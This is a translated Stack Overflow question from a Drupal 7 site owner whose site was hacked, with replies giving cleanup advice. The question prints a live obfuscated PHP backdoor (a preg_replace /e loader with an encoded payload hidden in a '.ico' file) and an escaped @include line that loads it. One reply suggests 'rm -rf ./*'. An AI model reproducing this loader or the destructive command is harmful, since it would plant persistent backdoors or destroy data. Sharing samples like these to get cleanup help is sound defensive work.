【发布时间】:2018-05-22 20:36:12
【问题描述】:
我的 drupal 7 网站最近遭到入侵 - 我猜是由于未修补的严重问题(我有两个比最新版本更旧的次要版本),但我无法再次清理它。
发生了什么:
有时(可能由访问某些页面触发)站点进入内部错误,其中根 URL 显示类似(抱歉 - 我这次忘了记录)“PHP 错误,预期)但是,在 .. .. .ico 文件有一些路径"
那个 ico 文件只包含一些 PHP 代码。并且位于不同的地方,通常它的名字像 .fsdr4ef.ico 并且位于随机的地方,比如 modues/file
示例内容:
pk/(/vz8rq/trim/mvo0/(/v/preg_replace/m6yf/( /qp/rawurldecode/s8/(/13rz/"%2F%5C%28.%2A%24%2F"/es/)/ctyo/, '', FILE/st8j1/)/htzf3 //p6i25/)/k1vd//k5/)/dh0/;$6famu = "G%00%17K%12%07%03S%0A%40%0C%07G%09%15C%11V%02%0Bj%00A%07%17%0AV%12h%00A%06%07A%06%0ENJF %24%1D%3D%07V%05%0F%5B%06%06N%10%1B%5C%03V%0El%00%09%5B%17K%11%170M%14R%02G%06F%12O%0EXJT %24l%17GY%0E%16D%10%0ETCV%1EQ%00X%13%05%13%5B%00Z%00%0C%01%0E%14F%04C%06%0DEK%0A%13%0B%1FG %10%1BC%17%0C%0AA%14%40%1D%0C%1EZOLG%40%04%0C%5E%0E%5D%08CR%0EA%10X%13%05%09GK%0A%00%5E %15F%13%0A%13_FF%17%5C%05%06%01%06BM%0BC%0A%10%1CX%0EM%0AD%05OLG%40%04%0C%5E%0E%5D %08CA%13F%5E%10%40%06%12%1DGA%05%17%18%40%12X%12G8BO%0B%5E%00%154%0A%0Fj%3E%1ACY%15GA%05%17 %18%40%12X%12G8BO%0B%5E%00%154%0A%0Fj%3E%13YF%11%19F%19%0A%19uB%5E%3E%08%1El%11%1BO%18%05 %05M%09U%0E%0EA%14T%14%5B%1B%0FM%0EH%17AW%06%05Z%07KKX%1DK %12B%11%5DCBM%02_%0F%09%0CA%04ZK%17%10%01_%08C%1A%02F%15%1B%3DGR%14%13%40%1BX%1E%0A%16%5BF %0AC%14FRgF%1A_F%5B%7CC%03U%16%06R%02%20%196%02%2A_C%609%1646p%0AG%28%0A0%60%27uFd3Cb%1A%0B%3EWVA%3FnFd%15C %40%29%0B%5D1J%1AP%12%06%07DH%3FD%19%2AT0O%23FFd9Cb3%60%2
而且更长。
这个 ico 包含被随机生成的 index.php 文件调用,这些文件也放置在不同的目录中(代码也在根文件夹的主 index.php 中)
/55b79/
@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\ 155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";
/55b79/
到目前为止我做了什么:
I changed my FTP password
Deleted everything by sites/ folde
Uploaded a lates Drupal 7 version
Searched and deleted all index.php files and suspicious .ico files
Changed Drupal admin password
Updated all modules and removed unsused ones
一切似乎都运行良好,但几天后同样的问题 - 我真的不知道它是怎么发生的?我什至在所有 .php 文件中都进行了搜索,以找出可以在哪里创建那些 index.php 左右,但没有找到任何东西。
感谢您的帮助。
TC
【问题讨论】:
-
如果你的网站被黑了,你必须弄清楚它是如何被黑的,或者只是刷新整个服务器。例如,如果您有一个泄漏的 PHP 脚本,它允许代码注入,那么感染仍然无法超出 PHP 用户在系统中的权限,因此只需刷新您的 web 文件夹就足够了。但如果你不知道,服务器的其他部分可能会被黑客入侵,任何撤消它的尝试都可能再次被否决。你可以换锁,但如果小偷还在里面,那就无济于事了..
-
您好,这是普通的商业托管 - 正如我所说 - 我更改了所有密码并删除了我在 Drupal 用户数据库中找到的所有虚假帐户。所以现在有一些代码在我使用最新的 Drupal 版本时仍然存在。但是找不到那个“来源”。
-
您需要重做所有事情。您不能确定某些内容没有被修改以创建后门 serverfault.com/questions/218005/…。
-
发生在我最近支持的网站之一。托管公司从备份中恢复了站点以解决问题。您可能想看看您的托管公司是否会为您做同样的事情。
-
您在这里谈论的是drupal 7。谁知道您使用的是什么过时的模块(更不用说核心了)。有可能该漏洞也处于干净版本中,并且贡献者刚刚停止支持。可以想象,除非您自己追踪漏洞并修补它,否则您的网站将永久易受攻击。否则,我建议 ssh 进入 web root 和
rm -rf ./*并且永远不要再使用 drupal ......如果你不是 ssh 用户,那将删除你的整个网站。
标签: php drupal-7 code-cleanup